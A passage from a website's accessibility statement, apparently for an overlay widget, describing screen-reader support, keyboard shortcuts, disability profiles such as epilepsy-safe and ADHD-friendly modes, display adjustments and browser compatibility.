combination. Screen-reader users also get automatic announcements to turn
the Screen-reader mode on as soon as they enter the website.
These adjustments are compatible with popular screen readers such as JAWS,
NVDA, VoiceOver, and TalkBack.
2. Keyboard navigation optimization: The background process also adjusts the
website’s HTML and adds various behaviors using JavaScript code to make the
website operable by the keyboard. This includes the ability to navigate the
website using the Tab and Shift+Tab keys, operate dropdowns with the arrow
keys, close them with Esc, trigger buttons and links using the Enter key,
navigate between radio and checkbox elements using the arrow keys, and fill
them in with the Spacebar or Enter key.
Additionally, keyboard users will find content-skip menus available at any
time by clicking Alt+2, or as the first element of the site while navigating
with the keyboard. The background process also handles triggered popups by
moving the keyboard focus towards them as soon as they appear, not allowing
the focus to drift outside.
Users can also use shortcuts such as “M” (menus), “H” (headings), “F”
(forms), “B” (buttons), and “G” (graphics) to jump to specific elements.
Disability profiles supported on our website
* Epilepsy Safe Profile: this profile enables people with epilepsy to safely
use the website by eliminating the risk of seizures resulting from flashing
or blinking animations and risky color combinations.
* Vision Impaired Profile: this profile adjusts the website so that it is
accessible to the majority of visual impairments such as Degrading Eyesight,
Tunnel Vision, Cataract, Glaucoma, and others.
* Cognitive Disability Profile: this profile provides various assistive
features to help users with cognitive disabilities such as Autism, Dyslexia,
CVA, and others, to focus on the essential elements more easily.
* ADHD Friendly Profile: this profile significantly reduces distractions and
noise to help people with ADHD, and Neurodevelopmental disorders browse,
read, and focus on the essential elements more easily.
* Blind Users Profile (Screen-readers): this profile adjusts the website to be
compatible with screen-readers such as JAWS, NVDA, VoiceOver, and TalkBack. A
screen-reader is installed on the blind user’s computer, and this site is
compatible with it.
* Keyboard Navigation Profile (Motor-Impaired): this profile enables
motor-impaired persons to operate the website using the keyboard Tab,
Shift+Tab, and the Enter keys. Users can also use shortcuts such as “M”
(menus), “H” (headings), “F” (forms), “B” (buttons), and “G” (graphics) to
jump to specific elements.
Additional UI, design, and readability adjustments
1. Font adjustments – users can increase and decrease its size, change its
family (type), adjust the spacing, alignment, line height, and more.
2. Color adjustments – users can select various color contrast profiles such as
light, dark, inverted, and monochrome. Additionally, users can swap color
schemes of titles, texts, and backgrounds with over seven different coloring
options.
3. Animations – epileptic users can stop all running animations with the click
of a button. Animations controlled by the interface include videos, GIFs,
and CSS flashing transitions.
4. Content highlighting – users can choose to emphasize essential elements such
as links and titles. They can also choose to highlight focused or hovered
elements only.
5. Audio muting – users with hearing devices may experience headaches or other
issues due to automatic audio playing. This option lets users mute the
entire website instantly.
6. Cognitive disorders – we utilize a search engine linked to Wikipedia and
Wiktionary, allowing people with cognitive disorders to decipher meanings of
phrases, initials, slang, and others.
7. Additional functions – we allow users to change cursor color and size, use a
printing mode, enable a virtual keyboard, and many other functions.
Assistive technology and browser compatibility
We aim to support as many browsers and assistive technologies as possible, so
our users can choose the best fitting tools for them, with as few limitations as
possible. Therefore, we have worked very hard to be able to support all major
systems that comprise over 95% of the user market share, including Google
Chrome, Mozilla Firefox, Apple Safari, Opera and Microsoft Edge, JAWS, and NVDA
(screen readers), both for Windows and MAC users.
Notes, comments, and feedback
Despite our very best efforts to allow anybody to adjust the website to their
needs, there may still be pages or sections that are not fully accessible, are
in the process of becoming accessible, or are lacking an adequate technological
solution to make them accessible. Still, we are continually improving our
accessibility, adding, updating, improving its options and features, and
developing and adopting new technologies. All this is meant to reach the optimal
level of accessibility following technological advancements. If you wish to
contact the website’s owner, please use the website's form
Hide Accessibility Interface? Please note: If you choose to hide the
accessibility interface, you won't be able to see it anymore, unless you clear
your browsing history and data. Are you sure that you wish to hide the
interface?
Accept Cancel
Continue
Processing the data, please give it a few seconds...
AddThis Sharing Sidebar
Share to FacebookFacebookShare to TwitterTwitterShare to PrintPrintMore AddThis
Share optionsAddThis
41
SHARES
Hide
Show
Close
AddThis